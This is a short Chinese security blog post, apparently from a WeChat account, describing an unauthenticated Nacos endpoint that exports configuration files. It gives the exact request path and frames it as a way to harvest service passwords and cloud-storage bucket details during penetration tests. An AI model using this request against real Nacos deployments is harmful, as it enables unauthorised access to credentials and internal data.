1day-Nacos未授权下载配置信息

文摘   科技   2024-06-03 14:19   山东  

    免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

     众所周知nacos不管是渗透测试或者红蓝攻防过程当中出现频率颇高,当我们通过一系列手段进入系统后台后往往会去看配置信息,看是否会泄漏服务密码或者oss存储桶信息。

    有没有漏洞可以不登录直接下载配置信息呢?

/v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId=

如图,对于某些nacos网站是可以的

如此以来我们就可以不用登录就直接未授权下载配置文件了。


思极安全实验室
此公众号致力于分享安全技术,包括web渗透、代码审计、内网/域渗透、免杀等内容。